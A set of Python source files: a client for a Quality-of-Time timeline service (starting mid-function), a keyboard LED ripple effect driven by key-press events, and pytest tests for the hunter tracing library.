def _f(*arguments):
for index, argument in enumerate(inspect.getfullargspec(function)[0]):
if not isinstance(arguments[index], function.__annotations__[argument]):
raise TypeError("{} is not of type {}".format(arguments[index], function.__annotations__[argument]))
return function(*arguments)
_f.__doc__ = function.__doc__
return _f
# Decorator 2 to Perform Type Checking
def coerceargs(function):
def _f(*arguments):
new_arguments = []
for index, argument in enumerate(inspect.getfullargspec(function)[0]):
new_arguments.append(function.__annotations__[argument](arguments[index]))
return function(*new_arguments)
_f.__doc__ = function.__doc__
return _f
def _recv_fds(self, msglen, maxfds):
fds = array.array("i") # Array of ints
msg, ancdata, flags, addr = self._sock.recvmsg(msglen, socket.CMSG_LEN(maxfds * fds.itemsize))
for cmsg_level, cmsg_type, cmsg_data in ancdata:
if (cmsg_level == socket.SOL_SOCKET and cmsg_type == socket.SCM_RIGHTS):
# Append data, ignoring any truncated integers at the end.
fds.frombytes(cmsg_data[:len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
return msg, list(fds)
def _send_timeline_msg(self):
'''Send a request to the QoT Timeline Service over its Unix domain socket'''
# Convert message to JSON
message = json.dumps(self._tl_msg)
# Send message to timeline service
bytesSent = self._sock.send(message.encode())
# Maximum message size to receive in one go
MAX_BUF_LEN = 4096
# Received Message
msg_recv = ""
recv_flag = False
# Wait for a response from the timeline service
if bytesSent > 0 and self._tl_msg["msgtype"] != int(TimelineMessageTypes.TIMELINE_SHM_CLOCK):
amount_received = MAX_BUF_LEN
while amount_received == MAX_BUF_LEN:
data = self._sock.recv(MAX_BUF_LEN).decode()
amount_received = len(data)
msg_recv = msg_recv + data
recv_flag = True
# Possible error in receiving message
if not recv_flag:
print ('Could not receive data from service')
return ReturnTypes.QOT_RETURN_TYPE_CONN_ERR
# Decode Message from JSON
self._tl_msg = json.loads(msg_recv)
return self._tl_msg["retval"]
elif bytesSent == 0:
print ('Failed to send message to service')
self._tl_msg["retval"] = int(ReturnTypes.QOT_RETURN_TYPE_CONN_ERR)
return self._tl_msg["retval"]
else: # Message request to get clock shared memory
self._tl_msg["retval"] = int(ReturnTypes.QOT_RETURN_TYPE_OK)
return self._tl_msg["retval"]
return ReturnTypes.QOT_RETURN_TYPE_ERR
def _populate_timeline_msg_data(self):
'''Populate the fields of the timeline message based on the instance parameters'''
self._tl_msg = dict()
# Timeline Information
self._tl_msg["info"] =dict()
self._tl_msg["info"]["index"] = self._timeline_index
self._tl_msg["info"]["type"] = int(self._tl_type)
self._tl_msg["info"]["name"] = self._timeline_uuid
# Binding Information
self._tl_msg["binding"] = dict()
self._tl_msg["binding"]["name"] = self._binding_name
self._tl_msg["binding"]["id"] = self._binding_id;
# QoT Requirements
self._tl_msg["demand"] = dict()
self._tl_msg["demand"]["resolution"] = dict()
self._tl_msg["demand"]["resolution"]["sec"] = int(math.floor(self._resolution_ns/1000000000))
self._tl_msg["demand"]["resolution"]["asec"] = int((self._resolution_ns % 1000000000)*1000000000)
self._tl_msg["demand"]["accuracy"] = dict()
self._tl_msg["demand"]["accuracy"]["above"] = dict()
self._tl_msg["demand"]["accuracy"]["below"] = dict()
self._tl_msg["demand"]["accuracy"]["above"]["sec"] = int(math.floor(self._accuracy_ns/1000000000))
self._tl_msg["demand"]["accuracy"]["above"]["asec"] = int((self._accuracy_ns % 1000000000)*1000000000)
self._tl_msg["demand"]["accuracy"]["below"]["sec"] = int(math.floor(self._accuracy_ns/1000000000))
self._tl_msg["demand"]["accuracy"]["below"]["asec"] = int((self._accuracy_ns % 1000000000)*1000000000)
def _populate_timeline_msg_type(self, msg_type: TimelineMessageTypes):
'''Populate the message type of the timeline message'''
# Message Type
self._tl_msg["msgtype"] = int(msg_type)
# Return Code
self._tl_msg["retval"] = int(ReturnTypes.QOT_RETURN_TYPE_ERR)
@asyncio.coroutine
def _nats_subscribe(self):
'''Run the NATS Subscriber '''
self._nc = NATS()
# Connect to the NATS Server
yield from self._nc.connect(servers=["nats://nats.default.svc.cluster.local:4222"], io_loop=self._loop)
@asyncio.coroutine
def message_handler(msg):
subject = msg.subject
reply = msg.reply
data = msg.data.decode()
print("Received a message on '{subject} {reply}': {data}".format(
subject=subject, reply=reply, data=data))
# Parse the received JSON
params = json.loads(data)
# Add the latest parameters to the ring buffer
self._param_ring_buf.append(params)
# Simple publisher and async subscriber via coroutine.
tl_subject = "qot." + "timeline." + self._timeline_uuid + ".params"
sid = yield from self._nc.subscribe(tl_subject, cb=message_handler)
# Loop until the process unbinds from timeline
while self._nats_thread_running:
yield from asyncio.sleep(1, loop=self._loop)
# Disconnect from NATS Server
yield from self._nc.close()
def _dispatch_nats(self):
''' Thread Handler to dispatch NATS Subscriber'''
# Create a Ring Buffer of Clock Parameters
self._param_ring_buf = RingBuffer(MAX_RING_BUFFER_SIZE)
# Append initial value to ring buffer
init_params = {"l_mult":0,"l_nsec":0,"last":0,"mult":0,"nsec":0,"u_mult":0,"u_nsec":0}
self._param_ring_buf.append(init_params)
# Run AsynIO Loop
self._loop.run_until_complete(self._nats_subscribe())
def _find_clkparams(self, coretime):
'''Find the appropriate clock parameters based on the core time'''
# Get the list of stored parameters
param_list = self._param_ring_buf.get()
# Parse the param list (newest first) to find the appropriate clock parameters,
# falling back to the oldest stored entry if none predates the given core time
params = param_list[0]
for list_params in reversed(param_list):
# Compare with "last" after converting "last" to fractional seconds
if coretime > list_params["last"]/1000000000:
params = list_params
break
return params
def _core2timeline(self, period_flag, coretime_ns, clk_params):
'''Convert from core time to timeline time'''
if period_flag:
tl_time = coretime_ns + int(clk_params[1]*coretime_ns)/1000000000
else:
tl_time = coretime_ns - clk_params[0]
tl_time = clk_params[2] + tl_time + (int(clk_params[1]*tl_time)/1000000000)
return tl_time
def _timeline2core(self, period_flag, tltime_ns, clk_params):
'''Convert from timeline time to core time'''
if period_flag:
core_time = int(tltime_ns*1000000000)/(clk_params[1]+1000000000)
else:
diff = tltime_ns - clk_params[2]
quot = int(diff*1000000000)/(clk_params[1]+1000000000)
core_time = clk_params[0] + quot
return core_time
def _compute_qot(self, coretime_ns, clk_params):
'''Compute the QoT estimates for the timestamp'''
upper_bound = int(clk_params[5]*(coretime_ns - clk_params[0]))/1000000000 + clk_params[3]
lower_bound = int(clk_params[6]*(coretime_ns - clk_params[0]))/1000000000 + clk_params[4]
return upper_bound, lower_bound
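# Note (added for clarity; layout inferred from the conversions above): the memory-mapped clock
# parameters are unpacked with struct.unpack('@qqqqqqq') into seven signed 64-bit fields used as
#   params[0] = last   (core time at the last sync, ns)
#   params[1] = mult   (frequency correction, parts per billion)
#   params[2] = nsec   (timeline time at the last sync, ns)
#   params[3] = u_nsec, params[5] = u_mult  (upper uncertainty offset / drift)
#   params[4] = l_nsec, params[6] = l_mult  (lower uncertainty offset / drift)
# mirroring the l_mult/l_nsec/last/mult/nsec/u_mult/u_nsec fields received over NATS.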
####### Public API Calls #######
@checkargs
def timeline_bind(self: object, timeline_uuid: str, app_name: str, res_ns: int, acc_ns: int):
'''
* @brief Bind to a timeline with a given resolution and accuracy
* @param timeline_uuid Name of the timeline
* @param app_name Name of this binding
* @param res_ns Maximum tolerable unit of time in nanoseconds
* @param acc_ns Maximum tolerable deviation from true time in nanoseconds
* @return A status code indicating success (0) or other'''
print("Binding to timeline %s" % timeline_uuid)
self._timeline_uuid = timeline_uuid
self._binding_name = app_name
self._resolution_ns = res_ns
self._accuracy_ns = acc_ns
self._timeline_index = 0
self._binding_id = -1
# Timeline type
if timeline_uuid.find("gl_") == 0:
self._tl_type = TimelineTypes.QOT_TIMELINE_GLOBAL
else:
self._tl_type = TimelineTypes.QOT_TIMELINE_LOCAL
# Return Value
retval = ReturnTypes.QOT_RETURN_TYPE_OK
if self._mode == "transform":
# Start a new thread for NATS which runs AsyncIO
self._nats_thread_running = True # Flag to terminate thread
self._nats_thread = Thread(target=self._dispatch_nats)
self._nats_thread.start()
else: # Assume App Mode
# Create a UDS socket
self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# Connect the socket to the path where the qot-timeline-service is listening
try:
self._sock.connect(TL_SOCKET_PATH)
except socket.error as msg:
print (msg)
retval = ReturnTypes.QOT_RETURN_TYPE_CONN_ERR
return retval
# Initialize Timeline service message
self._populate_timeline_msg_data()
# Send TIMELINE_CREATE message to timeline service
self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_CREATE)
if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
print ('Failed to send timeline metadata to timeline service')
retval = ReturnTypes.QOT_RETURN_TYPE_ERR
return retval
else:
self._timeline_index = self._tl_msg["info"]["index"]
print ('Timeline ID is %d' % self._timeline_index)
# Send TIMELINE_BIND message to timeline service
self._populate_timeline_msg_data()
self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_BIND)
if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
print ('Failed to send bind request to timeline service')
retval = ReturnTypes.QOT_RETURN_TYPE_ERR
return retval
else:
self._binding_id = self._tl_msg["binding"]["id"]
print ('Binding ID is %d' % self._binding_id)
# Send TIMELINE_SHM_CLOCK message to timeline service
self._populate_timeline_msg_data()
self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_SHM_CLOCK)
if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
print ('Failed to request timeline clock from timeline service')
retval = ReturnTypes.QOT_RETURN_TYPE_ERR
return retval
else:
# Get the timeline clock parameter file descriptor from the timeline service
msg, shm_fd_list = self._recv_fds(20, 1)
shm_fd = shm_fd_list[0]
# Memory map the parameters into a byte array
self._clk_params = mmap.mmap(shm_fd, 0, flags=mmap.MAP_SHARED, prot=mmap.PROT_READ)
print("Bound to timeline %s" % timeline_uuid)
return retval
@checkargs
def timeline_unbind(self: object):
'''
* @brief Unbind from a timeline
* @return A status code indicating success (0) or other'''
if self._mode == "transform":
# NATS Thread Join
self._nats_thread_running = False
self._nats_thread.join()
# Close the AsyncIO Loop
self._loop.close()
else:
# Send TIMELINE_BIND message to timeline service
self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_UNBIND)
if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
print ('Failed to send unbind message to timeline service')
retval = ReturnTypes.QOT_RETURN_TYPE_ERR
return retval
else:
print ('Unbound from timeline service')
return ReturnTypes.QOT_RETURN_TYPE_OK
@checkargs
def timeline_get_accuracy(self: object):
'''
* @brief Get the accuracy requirement associated with this binding
* @return acc Maximum tolerable deviation from true time in nanoseconds'''
return self._accuracy_ns
@checkargs
def timeline_get_resolution(self: object):
'''
* @brief Get the resolution requirement associated with this binding
* @return res Maximum tolerable unit of time in nanoseconds'''
return self._resolution_ns
@checkargs
def timeline_get_name(self: object):
'''
* @brief Query the name of this application
* @return name Application name'''
return self._binding_name
@checkargs
def timeline_get_uuid(self: object):
'''
* @brief Query the name of this timeline
* @return name Timeline name'''
return self._timeline_uuid
@checkargs
def timeline_set_accuracy(self: object, acc_ns: int):
'''
* @brief Set the accuracy requirement associated with this binding
* @param acc Maximum tolerable deviation from true time in nanoseconds
* @return A status code indicating success (0) or other'''
self._accuracy_ns = acc_ns
if self._mode != "transform":
# Send TIMELINE_UPDATE message to timeline service
self._populate_timeline_msg_data()
self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_UPDATE)
if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
print ('Failed to send accuracy update to timeline service')
retval = ReturnTypes.QOT_RETURN_TYPE_ERR
return retval
return ReturnTypes.QOT_RETURN_TYPE_OK
@checkargs
def timeline_set_resolution(self: object, res_ns: int):
'''
* @brief Set the resolution requirement associated with this binding
* @param res Maximum tolerable unit of time in nanoseconds
* @return A status code indicating success (0) or other'''
self._resolution_ns = res_ns
if self._mode != "transform":
# Send TIMELINE_UPDATE message to timeline service
self._populate_timeline_msg_data()
self._populate_timeline_msg_type(TimelineMessageTypes.TIMELINE_UPDATE)
if self._send_timeline_msg() != int(ReturnTypes.QOT_RETURN_TYPE_OK):
print ('Failed to send resolution update to timeline service')
retval = ReturnTypes.QOT_RETURN_TYPE_ERR
return retval
return ReturnTypes.QOT_RETURN_TYPE_OK
@checkargs
def timeline_get_coretime(self: object):
'''
* @brief Query the time according to the core
* @return core_now Estimated time in fractional seconds
Note: Core Clock is CLOCK_REALTIME'''
return time.clock_gettime(time.CLOCK_REALTIME)
@checkargs
def timeline_gettime(self: object):
'''
* @brief Query the time according to the timeline
* @return est Estimated timeline time in fractional seconds with uncertainty'''
# Read the CLOCK_REALTIME core time
core_now_ns = int(math.floor(time.clock_gettime(time.CLOCK_REALTIME)*1000000000))
# Unpack the Memory-mapped Clock Parameters
params = struct.unpack('@qqqqqqq', self._clk_params)
tl_time = dict()
# Convert from core time to timeline time
tl_time["time_estimate"] = float(self._core2timeline(False, core_now_ns, params))/1000000000
# Add the Uncertainty
tl_time["interval_above"], tl_time["interval_below"] = self._compute_qot(core_now_ns, params)
tl_time["interval_above"] = float(tl_time["interval_above"])/1000000000
tl_time["interval_below"] = float(tl_time["interval_below"])/1000000000
# Return Timestamp, Upper Bound, Lower Bound
return tl_time
@checkargs
def timeline_set_schedparams(self: object, period_ns: int, offset_ns: int):
'''
* @brief Set the periodic scheduling parameters requirement associated with this binding
* @param start_offset First wakeup time
* @param period wakeup period
* @return A status code indicating success (0) or other'''
self._offset_ns = offset_ns
self._period_ns = period_ns
return 0
@checkargs
def timeline_waituntil(self: object, abs_time: float):
'''
* @brief Block wait until a specified uncertain point
* @param abs_time the absolute fractional time to wake up at
* @return Time at which the program resumes'''
# Unpack the Memory-mapped Clock Parameters
params = struct.unpack('@qqqqqqq', self._clk_params)
# Translate timeline time duration to core time
core_duration = float(self._timeline2core(False, int(abs_time*1000000000), params))/1000000000
# Sleep for the duration
time.sleep(core_duration)
return self.timeline_gettime() # Needs to be fleshed out
@checkargs
def timeline_waituntil_nextperiod(self: object):
'''
* @brief Block and wait until next period
* @return utp Returns the actual uncertain wakeup time'''
return self.timeline_gettime() # Needs to be fleshed out
@checkargs
def timeline_sleep(self: object, rel_time: float):
'''
* @brief Block for a specified length of uncertain time
* @param rel_time fractional seconds time to sleep for
* @return A status code indicating success (0) or other'''
# Unpack the Memory-mapped Clock Parameters
params = struct.unpack('@qqqqqqq', self._clk_params)
# Translate timeline time duration to core time
core_duration = float(self._timeline2core(True, int(rel_time*1000000000), params))/1000000000
# Sleep for the duration
time.sleep(core_duration)
return self.timeline_gettime() # Needs to be fleshed out
@checkargs
def timeline_core2rem(self: object, core_time: float):
'''
* @brief Converts core time to remote timeline time
* @param core_time time to be converted in nanoseconds
* @return A status code indicating success (0) or other'''
tl_time = dict()
# Find the appropriate clock parameters
if self._mode == "transform":
clk_params = self._find_clkparams(core_time)
# Translate core time to timeline time
tl_time["time_estimate"] = clk_params["nsec"] + (core_time*1000000000 - clk_params["last"]) + ((core_time*1000000000 - clk_params["last"])*(clk_params["mult"]))/1000000000
tl_time["time_estimate"] = float(tl_time["time_estimate"])/1000000000
# Add the uncertainty
tl_time["interval_above"] = float((clk_params["u_mult"]*(core_time*1000000000 - clk_params["last"]))/1000000000 + clk_params["u_nsec"])/1000000000
tl_time["interval_below"] = float((clk_params["l_mult"]*(core_time*1000000000 - clk_params["last"]))/1000000000 + clk_params["l_nsec"])/1000000000
else:
# Unpack the Memory-mapped Clock Parameters
params = struct.unpack('@qqqqqqq', self._clk_params)
# Translate core time to timeline time
tl_time["time_estimate"] = float(self._core2timeline(False, int(core_time*1000000000), params))/1000000000
# Add the uncertainty
tl_time["interval_above"], tl_time["interval_below"] = self._compute_qot(int(core_time*1000000000), params)
tl_time["interval_above"] = float(tl_time["interval_above"])/1000000000
tl_time["interval_below"] = float(tl_time["interval_below"])/1000000000
return tl_time
@checkargs
def timeline_rem2core(self: object, tl_time: float):
'''
* @brief Converts remote timeline time to core time
* @param tl_time time to be converted in nanoseconds
* @return core_time tl_time translated to core time'''
# Unpack the Memory-mapped Clock Parameters
params = struct.unpack('@qqqqqqq', self._clk_params)
# Translate timeline time duration to core time
core_time = float(self._timeline2core(False, int(tl_time*1000000000), params))/1000000000
return core_time
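# Hedged usage sketch (added for illustration; not part of the original file): typical "app"-mode
# flow, which requires a qot-timeline-service listening on TL_SOCKET_PATH. The timeline and
# binding names are placeholders:
#
#     app_binding = TimelineBinding("app")
#     app_binding.timeline_bind("my_timeline", "my_app", 1000, 1000)
#     now = app_binding.timeline_gettime()  # {'time_estimate', 'interval_above', 'interval_below'}
#     app_binding.timeline_unbind()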
# Global Binding Class
binding = TimelineBinding("transform")
def init_transform(timeline_uuid: str, app_name: str):
print("Initializing transform ...")
# Bind to the timeline
global binding
binding.timeline_bind(timeline_uuid, app_name, 1000, 1000)
return
# Transformation main function invoked by Sherlock
def main(ctx,msg):
global binding
global initialized
if not initialized:
# Initialize the Timeline Binding
init_transform('my_test_timeline', "qot_transform")
initialized = True
# Get the provided core time
coretime = float(msg)
sherlock_time = float(ctx._Context__msg.timestamp)/1000000000
print('---------------------------------------------------')
print('Received Timestamp from Sensor %f' % coretime)
print('Received Timestamp from Sherlock %f' % sherlock_time)
# Translate to Timeline Time
tl_time = binding.timeline_core2rem(coretime)
print('Translated Timeline time is %f' % tl_time["time_estimate"])
print('Upper Uncertainty bound is %f' % tl_time["interval_above"])
print('Lower Uncertainty bound is %f' % tl_time["interval_below"])
print('\n')
# Send the data to the next stage
ctx.send(json.dumps(tl_time).encode('utf-8'))
return
|
reactive_keyboard.py
|
import numpy as np #check_import
from collections import deque #check_import
import logging #check_import
# TODO: some quick tricks to see if keyboard effects work properly, and a small demonstration
# of the effect. Currently doesn't support multiple ripple waves.
# Even with 200 ripples, CPU usage is pretty low.
class Ripple:
ii = None
jj = None
def __init__(self, pos_i, pos_j, arr_shape):
self.pos_i = pos_i
self.pos_j = pos_j
self.current_r = 0.00001
self.arr_shape = arr_shape
# precompute for all ripples
if Ripple.ii is None and Ripple.jj is None:
Ripple.ii, Ripple.jj = np.meshgrid(range(self.arr_shape[0]), range(self.arr_shape[1]), indexing='ij')
# precompute for this ripple
self.ii = Ripple.ii - self.pos_i
self.jj = Ripple.jj - self.pos_j
self.sumii2jj2 = self.ii**2 + self.jj**2
def step(self):
scale = self.current_r * 1.5 # ripple wave length
output = np.exp( -np.abs(self.sumii2jj2 - self.current_r**2) / scale )
#output *= 1 / self.current_r # decrease wave magnitude over time v1
#output *= 1 / np.sqrt(self.current_r) # decrease wave magnitude over time v2
#output *= 1 / self.current_r**0.8 # decrease wave magnitude over time v3
output *= 3 / self.current_r**0.8 # decrease wave magnitude over time v4
output = output.reshape((self.arr_shape[0], self.arr_shape[1], 1))
self.current_r += 0.7 # speed
return output
def is_visible(self):
return self.current_r < 20 # magic number :S
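# Note (added for clarity): each step() renders an expanding ring centred on the key press.
# Per LED the intensity is exp(-|d^2 - r^2| / (1.5*r)) scaled by 3 / r**0.8, where d is the LED's
# distance from the press and r grows by 0.7 per frame, so the ring widens and fades until
# is_visible() drops the ripple at r >= 20.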
class CustomEffect:
def __init__(self, arr, driver):
self.arr = arr * 0
self.driver = driver
self.keyboard_mapper = KeyboardMapper(self.keyboard_cb)
self.ripple_list = deque()
def keyboard_cb(self, code, state, position):
# state=0 (press), state=1 (release), state=2 (hold)
if position is not None and state == 0:
i, j = position
self.ripple_list.append( Ripple(i, j, self.arr.shape) )
def update(self):
self.arr = self.arr * 0
output = None
for ripple in self.ripple_list:
if ripple.is_visible():
if output is None:
output = ripple.step()
else:
output += ripple.step()
if len(self.ripple_list) > 0:
if not self.ripple_list[0].is_visible():
self.ripple_list.popleft()
if output is not None:
output = np.clip(output, 0.0, 1.0)
self.arr[:,:,:] = output
return self.arr
def get_fps(self):
return 15
def is_enabled(self):
return True
def on_exit(self):
self.keyboard_mapper.exit()
#################################################################################################################
import inputs #check_import
import threading #check_import
import logging #check_import
class KeyboardMapper:
def __init__(self, callback):
self.selected_device = None
self.callback_function = None
self.is_enabled = True
self.thread_list = []
self.spinner = None
NOKEY = None # There is an LED but no key
# The "KEY_" prefix is removed from default_map entries and re-added in process_map()
# Note: the FN key doesn't work with this method
self.default_map=[#| 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 |
["ESC" , "F1" , "F2" , "F3" , "F4" , "F5" , "F6" , "F7" , "F8" , "F9" , "F10" , "F11" , "F12" , "PAUSE" , "SYSRQ" , "DELETE" , "KPMINUS", "KPPLUS" ], # 0
["GRAVE" , "1" , "2" , "3" , "4" , "5" , "6" , "7" , "8" , "9" , "0" , "MINUS" , "EQUAL" , None , "BACKSPACE" , "NUMLOCK", "KPSLASH", "KPASTERISK"], # 1
["TAB" , None , "Q" , "W" , "E" , "R" , "T" , "Y" , "U" , "I" , "O" , "P" , "LEFTBRACE" , "RIGHTBRACE" , "ENTER" , "KP7" , "KP8" , "KP9" ], # 2
["CAPSLOCK" , None , "A" , "S" , "D" , "F" , "G" , "H" , "J" , "K" , "L" , "SEMICOLON", "APOSTROPHE", "BACKSLASH" , NOKEY , "KP4" , "KP5" , "KP6" ], # 3
["LEFTSHIFT", NOKEY , "102ND", "Z" , "X" , "C" , "V" , "B" , "N" , "M" , "COMMA" , "DOT" , "SLASH" , "RIGHTSHIFT" , "UP" , "KP1" , "KP2" , "KP3" ], # 4
["LEFTCTRL" , None , None , "LEFTMETA", "LEFTALT", None , None , "SPACE", None , None , "RIGHTALT", "COMPOSE" , "RIGHTCTRL" , "LEFT" , "DOWN" , "RIGHT" , "KP0" , "KPDOT" ] # 5
]
self.default_map_inv = {}
self.process_map()
self.register_callback(callback)
#self.listen_for_magic_key() # METHOD-1: LISTEN FOR A SPECIFIC KEYBOARD
self.listen_all_keyboards() # METHOD-2: LISTEN ALL KEYBOARDS
def process_map(self):
rows = len(self.default_map)
cols = len(self.default_map[0])
for i in range(rows):
for j in range(cols):
keycode = self.default_map[i][j]
if keycode is not None:
self.default_map_inv["KEY_" + keycode] = (i,j)
def listen_all_keyboards(self):
for device in inputs.devices:
if device.device_type == "kbd":
logging.info("Listening keyboard device: %s", device.name)
thread = threading.Thread(target=self.spinner_entrypoint_, args=(device,))
self.thread_list.append(thread)
thread.start()
# Listens to all input devices and sets selected_device to whichever receives a left or right Ctrl keystroke first
def listen_for_magic_key(self):
for device in inputs.devices:
if device.device_type == "kbd":
thread = threading.Thread(target=self.listen_for_magic_key_entrypoint_, args=(device,))
self.thread_list.append(thread)
thread.start()
def listen_for_magic_key_entrypoint_(self, device):
logging.info("Listening magic key from device: %s", device, )
while self.selected_device is None:
events = device.read()
if events:
for event in events:
if self.selected_device is None and (event.code == "KEY_LEFTCTRL" or event.code == "KEY_RIGHTCTRL"):
logging.info("Magic key (%s) detected from device: %s", event.code, device.name)
self.selected_device = device
self.spinner = threading.Thread(target=self.spinner_entrypoint_, args=(self.selected_device,))
self.spinner.start()
def spinner_entrypoint_(self, selected_device):
while self.is_enabled:
events = selected_device.read()
if events:
for event in events:
if event.ev_type == "Key":
position = None
if event.code in self.default_map_inv:
position = self.default_map_inv[event.code]
self.callback_function(event.code, event.state, position)
def register_callback(self, callback):
self.callback_function = callback
def exit(self):
self.is_enabled = False
#def event_cb(code, state, position):
# print(code, state, position)
#keyboard_mapper = KeyboardMapper(event_cb)
#################################################################################################################
"""
# KEY MAPPINGS ARE FOUND WITH STELLARIS 15 GEN3 USING THIS CODE
import numpy as np
class CustomEffect:
def __init__(self, arr, driver):
self.arr = arr
self.driver = driver
self.i = 0
self.j = 15 # SELECT COLUMN HERE
def update(self):
self.arr = self.arr * 0
self.arr[self.i, self.j] = np.array([1.0, 1.0, 1.0])
self.i = (self.i + 1) % 6
return self.arr
def get_fps(self):
return 1
def is_enabled(self):
return True
def on_exit(self):
pass
"""
|
test_hunter.py
|
from __future__ import print_function
import inspect
import os
import platform
import subprocess
import sys
import threading
from pprint import pprint
import pytest
import hunter
from hunter import And
from hunter import CallPrinter
from hunter import CodePrinter
from hunter import Debugger
from hunter import From
from hunter import Not
from hunter import Or
from hunter import Q
from hunter import Query
from hunter import VarsPrinter
from hunter import When
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
try:
from itertools import izip_longest
except ImportError:
from itertools import zip_longest as izip_longest
pytest_plugins = 'pytester',
class FakeCallable(object):
def __init__(self, value):
self.value = value
def __call__(self):
raise NotImplementedError('Nope')
def __repr__(self):
return repr(self.value)
def __str__(self):
return str(self.value)
def __eq__(self, other):
return self.value == other.value
def __hash__(self):
return hash(self.value)
C = FakeCallable
class EvilTracer(object):
def __init__(self, *args, **kwargs):
self._calls = []
threading_support = kwargs.pop('threading_support', False)
clear_env_var = kwargs.pop('clear_env_var', False)
self.handler = hunter._prepare_predicate(*args, **kwargs)
self._tracer = hunter.trace(self._append, threading_support=threading_support, clear_env_var=clear_env_var)
def _append(self, event):
# Make sure the lineno is cached. Frames are reused
# and later on the events would be very broken ..
event.lineno
self._calls.append(event)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._tracer.stop()
predicate = self.handler
for call in self._calls:
predicate(call)
trace = EvilTracer
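# Note (added for clarity): EvilTracer records events while tracing and only replays them through
# the prepared predicate in __exit__, so the `trace = EvilTracer` alias lets these tests keep the
# hunter.trace call style while evaluating predicates after the fact.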
def _get_func_spec(func):
if hasattr(inspect, 'signature'):
return str(inspect.signature(func))
if hasattr(inspect, 'getfullargspec'):
spec = inspect.getfullargspec(func)
else:
spec = inspect.getargspec(func)
return inspect.formatargspec(spec.args, spec.varargs)
def test_pth_activation():
module_name = os.path.__name__
expected_module = '{0}.py'.format(module_name)
hunter_env = 'action=CodePrinter,module={!r},function="join"'.format(module_name)
func_spec = _get_func_spec(os.path.join)
expected_call = 'call def join{0}:'.format(func_spec)
output = subprocess.check_output(
['python', os.path.join(os.path.dirname(__file__), 'sample.py')],
env=dict(os.environ, PYTHONHUNTER=hunter_env),
stderr=subprocess.STDOUT,
)
assert expected_module.encode() in output
assert expected_call.encode() in output
def test_pth_sample4():
env = dict(os.environ, PYTHONHUNTER='CodePrinter')
env.pop('COVERAGE_PROCESS_START', None)
env.pop('COV_CORE_SOURCE', None)
output = subprocess.check_output(
['python', os.path.join(os.path.dirname(__file__), 'sample4.py')],
env=env,
stderr=subprocess.STDOUT,
)
assert output
def test_pth_sample2(LineMatcher):
env = dict(os.environ, PYTHONHUNTER="module='__main__',action=CodePrinter")
env.pop('COVERAGE_PROCESS_START', None)
env.pop('COV_CORE_SOURCE', None)
output = subprocess.check_output(
['python', os.path.join(os.path.dirname(__file__), 'sample2.py')],
env=env,
stderr=subprocess.STDOUT,
)
lm = LineMatcher(output.decode('utf-8').splitlines())
lm.fnmatch_lines([
'*tests*sample2.py:* call if __name__ == "__main__": #*',
'*tests*sample2.py:* line if __name__ == "__main__": #*',
'*tests*sample2.py:* line import functools',
'*tests*sample2.py:* line def deco(opt):',
'*tests*sample2.py:* line @deco(1)',
'*tests*sample2.py:* call def deco(opt):',
'*tests*sample2.py:* line def decorator(func):',
'*tests*sample2.py:* line return decorator',
'*tests*sample2.py:* return return decorator',
'* * ... return value: <function deco*',
'*tests*sample2.py:* line @deco(2)',
'*tests*sample2.py:* call def deco(opt):',
'*tests*sample2.py:* line def decorator(func):',
'*tests*sample2.py:* line return decorator',
'*tests*sample2.py:* return return decorator',
'* * ... return value: <function deco*',
'*tests*sample2.py:* line @deco(3)',
'*tests*sample2.py:* call def deco(opt):',
'*tests*sample2.py:* line def decorator(func):',
'*tests*sample2.py:* line return decorator',
'*tests*sample2.py:* return return decorator',
'* * ... return value: <function deco*',
'*tests*sample2.py:* call def decorator(func):',
'*tests*sample2.py:* line @functools.wraps(func)',
'*tests*sample2.py:* line return wrapper',
'*tests*sample2.py:* return return wrapper',
'* * ... return value: <function foo *',
'*tests*sample2.py:* call def decorator(func):',
'*tests*sample2.py:* line @functools.wraps(func)',
'*tests*sample2.py:* line return wrapper',
'*tests*sample2.py:* return return wrapper',
'* * ... return value: <function foo *',
'*tests*sample2.py:* call def decorator(func):',
'*tests*sample2.py:* line @functools.wraps(func)',
'*tests*sample2.py:* line return wrapper',
'*tests*sample2.py:* return return wrapper',
'* * ... return value: <function foo *',
'*tests*sample2.py:* line foo(',
"*tests*sample2.py:* line 'a*',",
"*tests*sample2.py:* line 'b'",
'*tests*sample2.py:* call @functools.wraps(func)',
'* * [*] def wrapper(*args):',
'*tests*sample2.py:* line return func(*args)',
'*tests*sample2.py:* call @functools.wraps(func)',
'* * [*] def wrapper(*args):',
'*tests*sample2.py:* line return func(*args)',
'*tests*sample2.py:* call @functools.wraps(func)',
'* * [*] def wrapper(*args):',
'*tests*sample2.py:* line return func(*args)',
'*tests*sample2.py:* call @deco(1)',
'* * | @deco(2)',
'* * | @deco(3)',
'* * [*] def foo(*args):',
'*tests*sample2.py:* line return args',
'*tests*sample2.py:* return return args',
"* * ... return value: ('a*', 'b')",
"*tests*sample2.py:* return return func(*args)",
"* * ... return value: ('a*', 'b')",
"*tests*sample2.py:* return return func(*args)",
"* * ... return value: ('a*', 'b')",
"*tests*sample2.py:* return return func(*args)",
"* * ... return value: ('a*', 'b')",
"*tests*sample2.py:* line try:",
"*tests*sample2.py:* line None(",
"*tests*sample2.py:* line 'a',",
"*tests*sample2.py:* line 'b'",
"*tests*sample2.py:* exception *",
"* * ... exception value: *",
"*tests*sample2.py:* line except:",
"*tests*sample2.py:* line pass",
"*tests*sample2.py:* return pass",
"* ... return value: None",
])
def test_predicate_str_repr():
assert repr(Q(module='a', function='b')).endswith("predicates.Query: query_eq=(('function', 'b'), ('module', 'a'))>")
assert str(Q(module='a', function='b')) == "Query(function='b', module='a')"
